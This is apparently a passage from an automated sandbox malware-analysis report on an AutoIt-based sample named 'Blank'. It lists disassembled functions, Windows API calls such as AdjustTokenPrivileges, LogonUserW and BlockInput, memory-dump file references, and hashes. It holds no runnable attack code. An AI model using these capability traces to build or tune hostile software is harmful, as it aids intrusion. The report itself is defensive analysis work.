                                                                                                                                    • Opcode Fuzzy Hash: 046bf0e7ef60d43dcb658342f9dfa370b406999caa38b27a572ebdfa997e0eb5
                                                                                                                                    • Instruction Fuzzy Hash: BAF0A97190020DABDB00CF90C846BFE7BB4FF04315F00800AF94596292D3798A21DF94
                                                                                                                                    Function 002CA6AD Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,002D9B52,?,002F098C,?), ref: 002CA6DA
                                                                                                                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,002D9B52,?,002F098C,?), ref: 002CA6EC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3479602957-0
                                                                                                                                    • Opcode ID: 3ce84e07f8e7e51d5c8645822ae2889ba757b69205acb078a483609267ca359a
                                                                                                                                    • Instruction ID: 12e9ff214561e6ceebe85891eed6f13cc17da1d18e49fa3a7f261af958d7ccd0
                                                                                                                                    • Opcode Fuzzy Hash: 3ce84e07f8e7e51d5c8645822ae2889ba757b69205acb078a483609267ca359a
                                                                                                                                    • Instruction Fuzzy Hash: 4AF0893551421EBBDF209FA4DC48FEA776DAF09361F008255B90896141D6709950CFA1
                                                                                                                                    Function 002B8DE9 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002B8F27), ref: 002B8DFE
                                                                                                                                    • CloseHandle.KERNEL32(?,?,002B8F27), ref: 002B8E10
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 81990902-0
                                                                                                                                    • Opcode ID: 1b1e7a7854486a9016968670b798bfe145cb99aafa6b2b9974240edd137394b1
                                                                                                                                    • Instruction ID: ae046fae8979084d40fa0b202e58b9332993e2ba9ae9da3732c4f1dac1a04e3c
                                                                                                                                    • Opcode Fuzzy Hash: 1b1e7a7854486a9016968670b798bfe145cb99aafa6b2b9974240edd137394b1
                                                                                                                                    • Instruction Fuzzy Hash: 21E08635010601EFE7212B10FC09DB777ADEF00360710882DF859804B0CB219CF0DB10
                                                                                                                                    Function 0028A385 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00288F87,?,?,?,00000001), ref: 0028A38A
                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0028A393
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                    • Opcode ID: ab4b1f42fcec2f362d0e91005c1db39420e6ee4cf51ee001f73de41699686370
                                                                                                                                    • Instruction ID: e3fe9c7c6db53e03bf006760dc41ecdfdd155be069eb086d681e8d9d45fae78e
                                                                                                                                    • Opcode Fuzzy Hash: ab4b1f42fcec2f362d0e91005c1db39420e6ee4cf51ee001f73de41699686370
                                                                                                                                    • Instruction Fuzzy Hash: A0B09231464208ABCA402B91FC5DBA83F6AEB44AB2F4040A0FA0D44062CB625450CB91
                                                                                                                                    Function 002D45D5 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • BlockInput.USER32(00000001), ref: 002D45F0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BlockInput
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3456056419-0
                                                                                                                                    • Opcode ID: a9a4fb8ee143df8e3f6e6aff0e88495d765dac92f3da0def48dcbcc62d1b7b00
                                                                                                                                    • Instruction ID: 280a212953c4492018d999f3d10c87c91209052e189fe734e112348779347439
                                                                                                                                    • Opcode Fuzzy Hash: a9a4fb8ee143df8e3f6e6aff0e88495d765dac92f3da0def48dcbcc62d1b7b00
                                                                                                                                    • Instruction Fuzzy Hash: 49E04F752202159FD710BF5AE844A9AF7ECEFA87A0F008426FC49D7351DAB0ED618B91
                                                                                                                                    Function 002C51E2 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 002C5205
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: mouse_event
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2434400541-0
                                                                                                                                    • Opcode ID: e9500fb790379650a0e5d1b7a63816a9515095633a8fecb56ce7d1d9bc74d95b
                                                                                                                                    • Instruction ID: 564434d1953731991fe2d74a3d2bc12cfb8e2b11a7645b13ae7f0863b0c98cc4
                                                                                                                                    • Opcode Fuzzy Hash: e9500fb790379650a0e5d1b7a63816a9515095633a8fecb56ce7d1d9bc74d95b
                                                                                                                                    • Instruction Fuzzy Hash: 1BD092A5170E2A79ED580B249E1FF761608F3017D1F9C475D714A890C2ECE6F8E5A831
                                                                                                                                    Function 002B9369 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,002B8FA7), ref: 002B9389
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LogonUser
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1244722697-0
                                                                                                                                    • Opcode ID: 647c23862351d90ebdf67bae18c258144d4338301a7bedcf947928ee6991df15
                                                                                                                                    • Instruction ID: cfc253356d3e696743426a1e4fa98bf7f9037119d8926c9551971ec9ad68bc21
                                                                                                                                    • Opcode Fuzzy Hash: 647c23862351d90ebdf67bae18c258144d4338301a7bedcf947928ee6991df15
                                                                                                                                    • Instruction Fuzzy Hash: 61D05E3226050EABEF018EA4EC05EBE3B69EB04B01F408111FE15C51A1C775D835EB60
                                                                                                                                    Function 002A0722 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetUserNameW.ADVAPI32(?,?), ref: 002A0734
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: NameUser
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2645101109-0
                                                                                                                                    • Opcode ID: 345f2b2ff8b85ef1b17bdd20aa536f83a91e366b7dd76cb11c4a752e44a525ec
                                                                                                                                    • Instruction ID: fb22761a4e95e150b804e985f2bfc6d2b9d08803f887ac397c30d692b46790a5
                                                                                                                                    • Opcode Fuzzy Hash: 345f2b2ff8b85ef1b17bdd20aa536f83a91e366b7dd76cb11c4a752e44a525ec
                                                                                                                                    • Instruction Fuzzy Hash: 5FC04CF181010DDBCB05DBA0D9C8EFE7BBCAB04354F100059A105B2100DB749B44CA71
                                                                                                                                    Function 0028A354 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0028A35A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                    • Opcode ID: 18adadaea25fac8896ec0bfc5c2adf19f71b4e55b844ff707a75f4858060ba33
                                                                                                                                    • Instruction ID: 64336473205da3a50772de4a78cb64033840cff4449f8f0af5ec43d80924875e
                                                                                                                                    • Opcode Fuzzy Hash: 18adadaea25fac8896ec0bfc5c2adf19f71b4e55b844ff707a75f4858060ba33
                                                                                                                                    • Instruction Fuzzy Hash: 1FA0113002020CAB8A002B82FC088A8BFAEEA002A0B8080A0F80C00022CB32A8208A80
                                                                                                                                    Function 002D7EF0 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filememorywindowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • DeleteObject.GDI32(?), ref: 002D7F45
                                                                                                                                    • DeleteObject.GDI32(?), ref: 002D7F57
                                                                                                                                    • DestroyWindow.USER32 ref: 002D7F65
                                                                                                                                    • GetDesktopWindow.USER32 ref: 002D7F7F
                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 002D7F86
                                                                                                                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 002D80C7
                                                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 002D80D7
                                                                                                                                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002D811F
                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 002D812B
                                                                                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 002D8165
                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002D8187
                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002D819A
                                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002D81A5
                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 002D81AE
                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002D81BD
                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 002D81C6
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002D81CD
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 002D81D8
                                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002D81EA
                                                                                                                                    • #418.OLEAUT32(88C00000,00000000,00000000,002F3C7C,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002D8200
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 002D8210
                                                                                                                                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 002D8236
                                                                                                                                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 002D8255
                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002D8277
                                                                                                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002D8464
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$#418AdjustAllocClientCloseCopyDesktopDestroyHandleImageLockMessageReadSendShowSizeStreamUnlock
                                                                                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                    • API String ID: 2158968032-2373415609
                                                                                                                                    • Opcode ID: 22e5309f69cb4a86c8fd119c69652ae0183b6cbe14c4e9e3fae7279fc36b0816
                                                                                                                                    • Instruction ID: 1c0e371c463156ad917c834a947d237dd8f5eea92e5793462fd73c897a4da529
                                                                                                                                    • Opcode Fuzzy Hash: 22e5309f69cb4a86c8fd119c69652ae0183b6cbe14c4e9e3fae7279fc36b0816
                                                                                                                                    • Instruction Fuzzy Hash: 65028A71910219EFDB14DFA4DC89EAEBBB9FB48350F048559F905AB2A1CB30AD51CF60
                                                                                                                                    Function 002E3BA9 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CharUpperBuffW.USER32(?,?,002F0980), ref: 002E3C65
                                                                                                                                    • IsWindowVisible.USER32(?), ref: 002E3C89
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BuffCharUpperVisibleWindow
                                                                                                                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                                    • API String ID: 4105515805-45149045
                                                                                                                                    • Opcode ID: 22045569b621b15b7d690588ff5761dc2f393cc7cea7a7ed008724e6c228295b
                                                                                                                                    • Instruction ID: eb2fa5db28f454fec9006edcdd9ec0452e91fbabce9cae12a20188e16db3d273
                                                                                                                                    • Opcode Fuzzy Hash: 22045569b621b15b7d690588ff5761dc2f393cc7cea7a7ed008724e6c228295b
                                                                                                                                    • Instruction Fuzzy Hash: 8CD1E534274241CBCB15FF11C895AA9B7A5EF88394F504868F8855B3E2CB31EE6ACF41
                                                                                                                                    Function 002EABFF Relevance: 49.8, APIs: 33, Instructions: 274COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 002EAC55
                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 002EAC86
                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 002EAC92
                                                                                                                                    • SetBkColor.GDI32(?,000000FF), ref: 002EACAC
                                                                                                                                    • SelectObject.GDI32(?,?), ref: 002EACBB
                                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 002EACE6
                                                                                                                                    • GetSysColor.USER32(00000010), ref: 002EACEE
                                                                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 002EACF5
                                                                                                                                    • FrameRect.USER32(?,?,00000000), ref: 002EAD04
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 002EAD0B
                                                                                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 002EAD56
                                                                                                                                    • FillRect.USER32(?,?,?), ref: 002EAD88
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 002EADB3
                                                                                                                                      • Part of subcall function 002EAF18: GetSysColor.USER32(00000012), ref: 002EAF51
                                                                                                                                      • Part of subcall function 002EAF18: SetTextColor.GDI32(?,?), ref: 002EAF55
                                                                                                                                      • Part of subcall function 002EAF18: GetSysColorBrush.USER32(0000000F), ref: 002EAF6B
                                                                                                                                      • Part of subcall function 002EAF18: GetSysColor.USER32(0000000F), ref: 002EAF76
                                                                                                                                      • Part of subcall function 002EAF18: GetSysColor.USER32(00000011), ref: 002EAF93
                                                                                                                                      • Part of subcall function 002EAF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 002EAFA1
                                                                                                                                      • Part of subcall function 002EAF18: SelectObject.GDI32(?,00000000), ref: 002EAFB2
                                                                                                                                      • Part of subcall function 002EAF18: SetBkColor.GDI32(?,00000000), ref: 002EAFBB
                                                                                                                                      • Part of subcall function 002EAF18: SelectObject.GDI32(?,?), ref: 002EAFC8
                                                                                                                                      • Part of subcall function 002EAF18: InflateRect.USER32(?,000000FF,000000FF), ref: 002EAFE7
                                                                                                                                      • Part of subcall function 002EAF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002EAFFE
                                                                                                                                      • Part of subcall function 002EAF18: GetWindowLongW.USER32(00000000,000000F0), ref: 002EB013
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4124339563-0
                                                                                                                                    • Opcode ID: 3af4a0f359fbcbbf99ea9cf0de6f6ff6330e95f79ab2352a277c5ec927fdf663
                                                                                                                                    • Instruction ID: 00370369ccb8c1d7e18e50516de2f45c883b214e7f6cd65d08ceb53bd4460449
                                                                                                                                    • Opcode Fuzzy Hash: 3af4a0f359fbcbbf99ea9cf0de6f6ff6330e95f79ab2352a277c5ec927fdf663
                                                                                                                                    • Instruction Fuzzy Hash: C4A1AD72018301AFD7119F65EC48E6B7BA9FF88371F500A29F966961E2C770E854CF52
                                                                                                                                    Function 00262FE8 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • DestroyWindow.USER32(?,?,?), ref: 00263072
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 002630B8
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 002630C3
                                                                                                                                    • DestroyIcon.USER32(00000000,?,?,?), ref: 002630CE
                                                                                                                                    • DestroyWindow.USER32(00000000,?,?,?), ref: 002630D9
                                                                                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 0029C77C
                                                                                                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0029C7B5
                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0029CBDE
                                                                                                                                      • Part of subcall function 00261F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00262412,?,00000000,?,?,?,?,00261AA7,00000000,?), ref: 00261F76
                                                                                                                                    • SendMessageW.USER32(?,00001053), ref: 0029CC1B
                                                                                                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0029CC32
                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0029CC48
                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0029CC53
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
